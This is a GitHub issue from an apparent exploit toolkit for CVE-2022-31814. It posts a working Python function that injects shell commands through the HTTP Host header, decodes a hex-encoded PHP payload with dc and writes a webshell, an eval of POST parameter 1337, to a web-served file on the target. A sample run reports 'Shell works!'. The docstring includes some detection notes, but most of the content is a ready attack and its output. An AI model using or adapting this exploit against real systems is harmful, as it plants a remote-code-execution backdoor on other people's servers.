EvergreenCartoons / SenselessViolence

CVE-2022-31814 Exploitation Toolkit.

Replace base64 with hex #7

Open EvergreenCartoons opened 2 years ago

EvergreenCartoons commented 2 years ago

Swapping the base64 encoding for hex (decoded on the target by `dc`) actually works completely fine on our target.

def upload_webshell(base_url, target_path):
    """Send one GET request whose Host header carries an injected shell command.

    The injected command echoes a hex-encoded PHP snippet into ``dc``, which
    turns the hex back into bytes, and pipes the result into ``php``. The
    snippet opens ``shell_fullpath`` for writing and writes ``shell_code``
    into it. Both of those names are read from outside this function.

    Args:
        base_url: Prefix of the request URL; joined to ``target_path`` by
            plain string concatenation, with no separator handling.
        target_path: Path of the endpoint the request is sent to.

    Returns:
        None. The response is bound to ``r`` and never inspected, so this
        function does not report whether the request or the write succeeded.

    Detection and mitigation notes:
        The request stands out by its Host header, which contains quotes,
        spaces, ``;`` and ``|``. None of these are valid in a hostname, so a
        front-end rule that rejects any Host value that is not a plain
        ``hostname[:port]`` stops it regardless of how the payload is encoded.
        Because the payload is hex rather than base64, signatures keyed on
        base64 markers will not match; match on the header syntax instead.
        On the host, ``dc`` and ``php`` spawned by the web server process and
        a newly written ``.php`` file are the corresponding artefacts.
    """
    print("(+) Using command injection bug to inject webshell")
    # PHP snippet run once on the target: it writes shell_code to shell_fullpath
    # and dies if the file cannot be opened.
    php_code = f"<?$a=fopen(\"{shell_fullpath}\",\"w\") or die();$t='{shell_code}';fwrite($a,$t);fclose( $a);?>"
    # Earlier encoding, replaced by the hex form below:
    #    encoded_php = base64.b64encode(php_code.encode('ascii'))
    # .encode('ascii') raises UnicodeEncodeError if either interpolated value
    # contains a non-ASCII character.
    encoded_php = binascii.hexlify(php_code.encode('ascii'))
    # dc only treats A-F as hex digits in upper case; lower-case letters are
    # dc commands.
    encoded_php = encoded_php.upper()
    # Prints the bytes object, so the output carries a b'...' wrapper.
    print(encoded_php)
    # "16i" sets dc's input radix to 16 and "P" prints the number as raw bytes.
    # The leading and trailing quote/semicolon pieces presumably close and
    # reopen a quoted string on the server side -- confirm against the
    # vulnerable script.
    command_string = f"' *; echo '16i {encoded_php.decode('ascii')} P' | dc | php; '"
    print(command_string)
    # The whole command travels in the Host header; the URL itself is ordinary.
    headers = {'Host': command_string}
    target_url = base_url + target_path
    # verify=False turns off TLS certificate verification, and no timeout is
    # set, so the call can block indefinitely on an unresponsive host.
    r = requests.get(target_url, headers=headers, verify=False)
$ python3 test.py 
(+) Using command injection bug to inject webshell
b'3C3F24613D666F70656E28222F7573722F6C6F63616C2F7777772F73797374656D5F616476616E6365645F636F6E74726F6C2E706870222C22772229206F722064696528293B24743D273C3F706870206576616C28245F504F53545B313333375D293B3F3E273B6677726974652824612C2474293B66636C6F736528202461293B3F3E'
' *; echo '16i 3C3F24613D666F70656E28222F7573722F6C6F63616C2F7777772F73797374656D5F616476616E6365645F636F6E74726F6C2E706870222C22772229206F722064696528293B24743D273C3F706870206576616C28245F504F53545B313333375D293B3F3E273B6677726974652824612C2474293B66636C6F736528202461293B3F3E P' | dc | php; '
None
(+) Checking for our webshell...
(+) Shell works!
True